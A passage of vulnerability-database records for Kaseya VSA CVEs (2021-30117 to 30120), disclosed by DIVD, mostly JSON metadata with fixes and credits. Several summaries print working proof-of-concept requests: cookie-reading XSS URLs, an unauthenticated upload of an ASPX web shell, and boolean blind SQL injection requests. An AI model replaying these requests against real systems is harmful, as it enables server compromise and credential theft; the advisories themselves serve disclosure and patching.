"impact": {
"cvss": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.9,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/",
"refsource": "CONFIRM",
"url": "https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/"
},
{
"name": "https://csrit.divd.nl/DIVD-2021-00011",
"refsource": "CONFIRM",
"url": "https://csrit.divd.nl/DIVD-2021-00011"
},
{
"name": "https://csrit.divd.nl/CVE-2021-30120",
"refsource": "CONFIRM",
"url": "https://csrit.divd.nl/CVE-2021-30120"
}
]
},
"solution": [
{
"lang": "en",
"value": "Upgrade to a version above 9.5.6"
}
],
"source": {
"advisory": "DIVD-2021-00011",
"discovery": "INTERNAL"
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2021-30120",
"datePublished": "2021-07-09T13:22:17",
"dateReserved": "2021-04-02T00:00:00",
"dateUpdated": "2024-08-03T22:24:59.669Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2021-30119 (GCVE-0-2021-30119)
Vulnerability from nvd – Published: 2021-07-09 13:20 – Updated: 2024-08-03 22:24
VLAI?
Summary
Authenticated reflective XSS in HelpDeskTab/rcResults.asp The parameter result of /HelpDeskTab/rcResults.asp is insecurely returned in the requested web page and can be used to perform a Cross Site Scripting attack Example request: `https://x.x.x.x/HelpDeskTab/rcResults.asp?result=<script>alert(document.cookie)</script>` The same is true for the parameter FileName of /done.asp Eaxmple request: `https://x.x.x.x/done.asp?FileName=";</script><script>alert(1);a="&PathData=&originalName=shell.aspx&FileSize=4388&TimeElapsed=00:00:00.078`
Severity ?
5.4 (Medium)
CWE
- n/a
Assigner
References
| URL | Tags | ||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||
Credits
Discovered by Wietse Boonstra of DIVD
Additional research by Frank Breedijk and Hidde Smit of DIVD
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T22:24:59.199Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://csirt.divd.nl/DIVD-2021-00011"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://csirt.divd.nl/CVE-2021-30119"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"credits": [
{
"lang": "en",
"value": "Discovered by Wietse Boonstra of DIVD"
},
{
"lang": "en",
"value": "Additional research by Frank Breedijk and Hidde Smit of DIVD"
}
],
"descriptions": [
{
"lang": "en",
"value": "Authenticated reflective XSS in HelpDeskTab/rcResults.asp The parameter result of /HelpDeskTab/rcResults.asp is insecurely returned in the requested web page and can be used to perform a Cross Site Scripting attack Example request: `https://x.x.x.x/HelpDeskTab/rcResults.asp?result=\u003cscript\u003ealert(document.cookie)\u003c/script\u003e` The same is true for the parameter FileName of /done.asp Eaxmple request: `https://x.x.x.x/done.asp?FileName=\";\u003c/script\u003e\u003cscript\u003ealert(1);a=\"\u0026PathData=\u0026originalName=shell.aspx\u0026FileSize=4388\u0026TimeElapsed=00:00:00.078`"
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2022-04-04T06:25:17",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://csirt.divd.nl/DIVD-2021-00011"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://csirt.divd.nl/CVE-2021-30119"
}
],
"solutions": [
{
"lang": "en",
"value": "Upgrade to a version above 9.5.6"
}
],
"source": {
"advisory": "DIVD-2021-00011",
"discovery": "INTERNAL"
},
"title": "Authenticated Authenticated reflective XSS in Kaseya VSA \u003c= v9.5.6",
"x_generator": {
"engine": "Vulnogram 0.0.9"
},
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2021-30119",
"STATE": "PUBLIC",
"TITLE": "Authenticated Authenticated reflective XSS in Kaseya VSA \u003c= v9.5.6"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"credit": [
{
"lang": "eng",
"value": "Discovered by Wietse Boonstra of DIVD"
},
{
"lang": "eng",
"value": "Additional research by Frank Breedijk and Hidde Smit of DIVD"
}
],
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Authenticated reflective XSS in HelpDeskTab/rcResults.asp The parameter result of /HelpDeskTab/rcResults.asp is insecurely returned in the requested web page and can be used to perform a Cross Site Scripting attack Example request: `https://x.x.x.x/HelpDeskTab/rcResults.asp?result=\u003cscript\u003ealert(document.cookie)\u003c/script\u003e` The same is true for the parameter FileName of /done.asp Eaxmple request: `https://x.x.x.x/done.asp?FileName=\";\u003c/script\u003e\u003cscript\u003ealert(1);a=\"\u0026PathData=\u0026originalName=shell.aspx\u0026FileSize=4388\u0026TimeElapsed=00:00:00.078`"
}
]
},
"generator": {
"engine": "Vulnogram 0.0.9"
},
"impact": {
"cvss": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/",
"refsource": "CONFIRM",
"url": "https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/"
},
{
"name": "https://csirt.divd.nl/DIVD-2021-00011",
"refsource": "CONFIRM",
"url": "https://csirt.divd.nl/DIVD-2021-00011"
},
{
"name": "https://csirt.divd.nl/CVE-2021-30119",
"refsource": "CONFIRM",
"url": "https://csirt.divd.nl/CVE-2021-30119"
}
]
},
"solution": [
{
"lang": "en",
"value": "Upgrade to a version above 9.5.6"
}
],
"source": {
"advisory": "DIVD-2021-00011",
"discovery": "INTERNAL"
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2021-30119",
"datePublished": "2021-07-09T13:20:58",
"dateReserved": "2021-04-02T00:00:00",
"dateUpdated": "2024-08-03T22:24:59.199Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2021-30118 (GCVE-0-2021-30118)
Vulnerability from nvd – Published: 2021-07-09 13:19 – Updated: 2024-08-03 22:24
VLAI?
Summary
An attacker can upload files with the privilege of the Web Server process for Kaseya VSA Unified Remote Monitoring & Management (RMM) 9.5.4.2149 and subsequently use these files to execute asp commands The api /SystemTab/uploader.aspx is vulnerable to an unauthenticated arbitrary file upload leading to RCE. An attacker can upload files with the privilege of the Web Server process and subsequently use these files to execute asp commands. Detailed description --- Given the following request: ``` POST /SystemTab/uploader.aspx?Filename=shellz.aspx&PathData=C%3A%5CKaseya%5CWebPages%5C&__RequestValidationToken=ac1906a5-d511-47e3-8500-47cc4b0ec219&qqfile=shellz.aspx HTTP/1.1 Host: 192.168.1.194 Cookie: sessionId=92812726; %5F%5FRequestValidationToken=ac1906a5%2Dd511%2D47e3%2D8500%2D47cc4b0ec219 Content-Length: 12 <%@ Page Language="C#" Debug="true" validateRequest="false" %> <%@ Import namespace="System.Web.UI.WebControls" %> <%@ Import namespace="System.Diagnostics" %> <%@ Import namespace="System.IO" %> <%@ Import namespace="System" %> <%@ Import namespace="System.Data" %> <%@ Import namespace="System.Data.SqlClient" %> <%@ Import namespace="System.Security.AccessControl" %> <%@ Import namespace="System.Security.Principal" %> <%@ Import namespace="System.Collections.Generic" %> <%@ Import namespace="System.Collections" %> <script runat="server"> private const string password = "pass"; // The password ( pass ) private const string style = "dark"; // The style ( light / dark ) protected void Page_Load(object sender, EventArgs e) { //this.Remote(password); this.Login(password); this.Style(); this.ServerInfo(); <snip> ``` The attacker can control the name of the file written via the qqfile parameter and the location of the file written via the PathData parameter. Even though the call requires that a sessionId cookie is passed we have determined that the sessionId is not actually validated and any numeric value is accepted as valid. Security issues discovered --- * a sessionId cookie is required by /SystemTab/uploader.aspx, but is not actually validated, allowing an attacker to bypass authentication * /SystemTab/uploader.aspx allows an attacker to create a file with arbitrary content in any place the webserver has write access * The web server process has write access to the webroot where the attacker can execute it by requesting the URL of the newly created file. Impact --- This arbitrary file upload allows an attacker to place files of his own choosing on any location on the hard drive of the server the webserver process has access to, including (but not limited to) the webroot. If the attacker uploads files with code to the webroot (e.g. aspx code) he can then execute this code in the context of the webserver to breach either the integrity, confidentiality, or availability of the system or to steal credentials of other users. In other words, this can lead to a full system compromise.
Severity ?
9.8 (Critical)
CWE
- n/a
Assigner
References
| URL | Tags | |||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||
Credits
Discovered by Wietse Boonstra of DIVD
Additional research by Frank Breedijk of DIVD
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T22:24:59.357Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://csirt.divd.nl/CVE-2021-30118"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://csirt.divd.nl/DIVD-2021-00011"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://helpdesk.kaseya.com/hc/en-gb/articles/360019054377-9-5-5-Feature-Release-10-April-2021"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"credits": [
{
"lang": "en",
"value": "Discovered by Wietse Boonstra of DIVD"
},
{
"lang": "en",
"value": "Additional research by Frank Breedijk of DIVD"
}
],
"descriptions": [
{
"lang": "en",
"value": "An attacker can upload files with the privilege of the Web Server process for Kaseya VSA Unified Remote Monitoring \u0026 Management (RMM) 9.5.4.2149 and subsequently use these files to execute asp commands The api /SystemTab/uploader.aspx is vulnerable to an unauthenticated arbitrary file upload leading to RCE. An attacker can upload files with the privilege of the Web Server process and subsequently use these files to execute asp commands. Detailed description --- Given the following request: ``` POST /SystemTab/uploader.aspx?Filename=shellz.aspx\u0026PathData=C%3A%5CKaseya%5CWebPages%5C\u0026__RequestValidationToken=ac1906a5-d511-47e3-8500-47cc4b0ec219\u0026qqfile=shellz.aspx HTTP/1.1 Host: 192.168.1.194 Cookie: sessionId=92812726; %5F%5FRequestValidationToken=ac1906a5%2Dd511%2D47e3%2D8500%2D47cc4b0ec219 Content-Length: 12 \u003c%@ Page Language=\"C#\" Debug=\"true\" validateRequest=\"false\" %\u003e \u003c%@ Import namespace=\"System.Web.UI.WebControls\" %\u003e \u003c%@ Import namespace=\"System.Diagnostics\" %\u003e \u003c%@ Import namespace=\"System.IO\" %\u003e \u003c%@ Import namespace=\"System\" %\u003e \u003c%@ Import namespace=\"System.Data\" %\u003e \u003c%@ Import namespace=\"System.Data.SqlClient\" %\u003e \u003c%@ Import namespace=\"System.Security.AccessControl\" %\u003e \u003c%@ Import namespace=\"System.Security.Principal\" %\u003e \u003c%@ Import namespace=\"System.Collections.Generic\" %\u003e \u003c%@ Import namespace=\"System.Collections\" %\u003e \u003cscript runat=\"server\"\u003e private const string password = \"pass\"; // The password ( pass ) private const string style = \"dark\"; // The style ( light / dark ) protected void Page_Load(object sender, EventArgs e) { //this.Remote(password); this.Login(password); this.Style(); this.ServerInfo(); \u003csnip\u003e ``` The attacker can control the name of the file written via the qqfile parameter and the location of the file written via the PathData parameter. Even though the call requires that a sessionId cookie is passed we have determined that the sessionId is not actually validated and any numeric value is accepted as valid. Security issues discovered --- * a sessionId cookie is required by /SystemTab/uploader.aspx, but is not actually validated, allowing an attacker to bypass authentication * /SystemTab/uploader.aspx allows an attacker to create a file with arbitrary content in any place the webserver has write access * The web server process has write access to the webroot where the attacker can execute it by requesting the URL of the newly created file. Impact --- This arbitrary file upload allows an attacker to place files of his own choosing on any location on the hard drive of the server the webserver process has access to, including (but not limited to) the webroot. If the attacker uploads files with code to the webroot (e.g. aspx code) he can then execute this code in the context of the webserver to breach either the integrity, confidentiality, or availability of the system or to steal credentials of other users. In other words, this can lead to a full system compromise."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2022-04-04T06:25:16",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://csirt.divd.nl/CVE-2021-30118"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://csirt.divd.nl/DIVD-2021-00011"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://helpdesk.kaseya.com/hc/en-gb/articles/360019054377-9-5-5-Feature-Release-10-April-2021"
}
],
"solutions": [
{
"lang": "en",
"value": "SaaS version has been fixed by the vendor.\nUpgrade on-premise to version 9.5.6 or above"
}
],
"source": {
"advisory": "DIVD-2021-00011",
"discovery": "INTERNAL"
},
"title": "Unauthenticated Remote Code Execution in Kaseya VSA \u003c v9.5.5",
"x_generator": {
"engine": "Vulnogram 0.0.9"
},
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2021-30118",
"STATE": "PUBLIC",
"TITLE": "Unauthenticated Remote Code Execution in Kaseya VSA \u003c v9.5.5"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"credit": [
{
"lang": "eng",
"value": "Discovered by Wietse Boonstra of DIVD"
},
{
"lang": "eng",
"value": "Additional research by Frank Breedijk of DIVD"
}
],
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "An attacker can upload files with the privilege of the Web Server process for Kaseya VSA Unified Remote Monitoring \u0026 Management (RMM) 9.5.4.2149 and subsequently use these files to execute asp commands The api /SystemTab/uploader.aspx is vulnerable to an unauthenticated arbitrary file upload leading to RCE. An attacker can upload files with the privilege of the Web Server process and subsequently use these files to execute asp commands. Detailed description --- Given the following request: ``` POST /SystemTab/uploader.aspx?Filename=shellz.aspx\u0026PathData=C%3A%5CKaseya%5CWebPages%5C\u0026__RequestValidationToken=ac1906a5-d511-47e3-8500-47cc4b0ec219\u0026qqfile=shellz.aspx HTTP/1.1 Host: 192.168.1.194 Cookie: sessionId=92812726; %5F%5FRequestValidationToken=ac1906a5%2Dd511%2D47e3%2D8500%2D47cc4b0ec219 Content-Length: 12 \u003c%@ Page Language=\"C#\" Debug=\"true\" validateRequest=\"false\" %\u003e \u003c%@ Import namespace=\"System.Web.UI.WebControls\" %\u003e \u003c%@ Import namespace=\"System.Diagnostics\" %\u003e \u003c%@ Import namespace=\"System.IO\" %\u003e \u003c%@ Import namespace=\"System\" %\u003e \u003c%@ Import namespace=\"System.Data\" %\u003e \u003c%@ Import namespace=\"System.Data.SqlClient\" %\u003e \u003c%@ Import namespace=\"System.Security.AccessControl\" %\u003e \u003c%@ Import namespace=\"System.Security.Principal\" %\u003e \u003c%@ Import namespace=\"System.Collections.Generic\" %\u003e \u003c%@ Import namespace=\"System.Collections\" %\u003e \u003cscript runat=\"server\"\u003e private const string password = \"pass\"; // The password ( pass ) private const string style = \"dark\"; // The style ( light / dark ) protected void Page_Load(object sender, EventArgs e) { //this.Remote(password); this.Login(password); this.Style(); this.ServerInfo(); \u003csnip\u003e ``` The attacker can control the name of the file written via the qqfile parameter and the location of the file written via the PathData parameter. Even though the call requires that a sessionId cookie is passed we have determined that the sessionId is not actually validated and any numeric value is accepted as valid. Security issues discovered --- * a sessionId cookie is required by /SystemTab/uploader.aspx, but is not actually validated, allowing an attacker to bypass authentication * /SystemTab/uploader.aspx allows an attacker to create a file with arbitrary content in any place the webserver has write access * The web server process has write access to the webroot where the attacker can execute it by requesting the URL of the newly created file. Impact --- This arbitrary file upload allows an attacker to place files of his own choosing on any location on the hard drive of the server the webserver process has access to, including (but not limited to) the webroot. If the attacker uploads files with code to the webroot (e.g. aspx code) he can then execute this code in the context of the webserver to breach either the integrity, confidentiality, or availability of the system or to steal credentials of other users. In other words, this can lead to a full system compromise."
}
]
},
"generator": {
"engine": "Vulnogram 0.0.9"
},
"impact": {
"cvss": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/",
"refsource": "CONFIRM",
"url": "https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/"
},
{
"name": "https://csirt.divd.nl/CVE-2021-30118",
"refsource": "CONFIRM",
"url": "https://csirt.divd.nl/CVE-2021-30118"
},
{
"name": "https://csirt.divd.nl/DIVD-2021-00011",
"refsource": "CONFIRM",
"url": "https://csirt.divd.nl/DIVD-2021-00011"
},
{
"name": "https://helpdesk.kaseya.com/hc/en-gb/articles/360019054377-9-5-5-Feature-Release-10-April-2021",
"refsource": "CONFIRM",
"url": "https://helpdesk.kaseya.com/hc/en-gb/articles/360019054377-9-5-5-Feature-Release-10-April-2021"
}
]
},
"solution": [
{
"lang": "en",
"value": "SaaS version has been fixed by the vendor.\nUpgrade on-premise to version 9.5.6 or above"
}
],
"source": {
"advisory": "DIVD-2021-00011",
"discovery": "INTERNAL"
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2021-30118",
"datePublished": "2021-07-09T13:19:42",
"dateReserved": "2021-04-02T00:00:00",
"dateUpdated": "2024-08-03T22:24:59.357Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2021-30117 (GCVE-0-2021-30117)
Vulnerability from nvd – Published: 2021-07-09 13:18 – Updated: 2024-08-03 22:24
VLAI?
Summary
The API call /InstallTab/exportFldr.asp is vulnerable to a semi-authenticated boolean-based blind SQL injection in the parameter fldrId. Detailed description --- Given the following request: ``` GET /InstallTab/exportFldr.asp?fldrId=1’ HTTP/1.1 Host: 192.168.1.194 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Cookie: ASPSESSIONIDCQACCQCA=MHBOFJHBCIPCJBFKEPEHEDMA; sessionId=30548861; agentguid=840997037507813; vsaUser=scopeId=3&roleId=2; webWindowId=59091519; ``` Where the sessionId cookie value has been obtained via CVE-2021-30116. The result should be a failure. Response: ``` HTTP/1.1 500 Internal Server Error Cache-Control: private Content-Type: text/html; Charset=Utf-8 Date: Thu, 01 Apr 2021 19:12:11 GMT Strict-Transport-Security: max-age=63072000; includeSubDomains Connection: close Content-Length: 881 <!DOCTYPE html> <HTML> <HEAD> <title>Whoops.</title> <meta http-equiv="X-UA-Compatible" content="IE=Edge" /> <link id="favIcon" rel="shortcut icon" href="/themes/default/images/favicon.ico?307447361"></link> ----SNIP---- ``` However when fldrId is set to ‘(SELECT (CASE WHEN (1=1) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END))’ the request is allowed. Request: ``` GET /InstallTab/exportFldr.asp?fldrId=%28SELECT%20%28CASE%20WHEN%20%281%3D1%29%20THEN%201%20ELSE%20%28SELECT%201%20UNION%20SELECT%202%29%20END%29%29 HTTP/1.1 Host: 192.168.1.194 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Cookie: ASPSESSIONIDCQACCQCA=MHBOFJHBCIPCJBFKEPEHEDMA; sessionId=30548861; agentguid=840997037507813; vsaUser=scopeId=3&roleId=2; webWindowId=59091519; ``` Response: ``` HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; Charset=Utf-8 Date: Thu, 01 Apr 2021 17:33:53 GMT Strict-Transport-Security: max-age=63072000; includeSubDomains Connection: close Content-Length: 7960 <html> <head> <title>Export Folder</title> <style> ------ SNIP ----- ```
Severity ?
9.8 (Critical)
CWE
- n/a
Assigner
References
| URL | Tags | |||||||
|---|---|---|---|---|---|---|---|---|
|
||||||||
Credits
Discovered by Wietse Boonstra of DIVD
Additional research by Frank Breedijk of DIVD
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T22:24:59.631Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://helpdesk.kaseya.com/hc/en-gb/articles/360019966738-9-5-6-Feature-Release-8-May-2021"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"credits": [
{
"lang": "en",
"value": "Discovered by Wietse Boonstra of DIVD"
},
{
"lang": "en",
"value": "Additional research by Frank Breedijk of DIVD"
}
],
"descriptions": [
{
"lang": "en",
"value": "The API call /InstallTab/exportFldr.asp is vulnerable to a semi-authenticated boolean-based blind SQL injection in the parameter fldrId. Detailed description --- Given the following request: ``` GET /InstallTab/exportFldr.asp?fldrId=1\u2019 HTTP/1.1 Host: 192.168.1.194 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Cookie: ASPSESSIONIDCQACCQCA=MHBOFJHBCIPCJBFKEPEHEDMA; sessionId=30548861; agentguid=840997037507813; vsaUser=scopeId=3\u0026roleId=2; webWindowId=59091519; ``` Where the sessionId cookie value has been obtained via CVE-2021-30116. The result should be a failure. Response: ``` HTTP/1.1 500 Internal Server Error Cache-Control: private Content-Type: text/html; Charset=Utf-8 Date: Thu, 01 Apr 2021 19:12:11 GMT Strict-Transport-Security: max-age=63072000; includeSubDomains Connection: close Content-Length: 881 \u003c!DOCTYPE html\u003e \u003cHTML\u003e \u003cHEAD\u003e \u003ctitle\u003eWhoops.\u003c/title\u003e \u003cmeta http-equiv=\"X-UA-Compatible\" content=\"IE=Edge\" /\u003e \u003clink id=\"favIcon\" rel=\"shortcut icon\" href=\"/themes/default/images/favicon.ico?307447361\"\u003e\u003c/link\u003e ----SNIP---- ``` However when fldrId is set to \u2018(SELECT (CASE WHEN (1=1) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END))\u2019 the request is allowed. Request: ``` GET /InstallTab/exportFldr.asp?fldrId=%28SELECT%20%28CASE%20WHEN%20%281%3D1%29%20THEN%201%20ELSE%20%28SELECT%201%20UNION%20SELECT%202%29%20END%29%29 HTTP/1.1 Host: 192.168.1.194 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Cookie: ASPSESSIONIDCQACCQCA=MHBOFJHBCIPCJBFKEPEHEDMA; sessionId=30548861; agentguid=840997037507813; vsaUser=scopeId=3\u0026roleId=2; webWindowId=59091519; ``` Response: ``` HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; Charset=Utf-8 Date: Thu, 01 Apr 2021 17:33:53 GMT Strict-Transport-Security: max-age=63072000; includeSubDomains Connection: close Content-Length: 7960 \u003chtml\u003e \u003chead\u003e \u003ctitle\u003eExport Folder\u003c/title\u003e \u003cstyle\u003e ------ SNIP ----- ```"
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2022-04-04T06:25:15",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://helpdesk.kaseya.com/hc/en-gb/articles/360019966738-9-5-6-Feature-Release-8-May-2021"
}
],
"solutions": [
{
"lang": "en",
"value": "SaaS version has been fixed by the vendor\n\nOnpremise\nUpgrade the server to version 9.5.6 or above\nUpgrade the agent to version 9.5.0.23 or above"
}
],
"source": {
"advisory": "DIVD-2021-00011",
"discovery": "INTERNAL"
},
"title": "Authenticated SQL injection in Kaseya VSA \u003c v9.5.6",
"x_generator": {
"engine": "Vulnogram 0.0.9"
},
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2021-30117",
"STATE": "PUBLIC",
"TITLE": "Authenticated SQL injection in Kaseya VSA \u003c v9.5.6"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
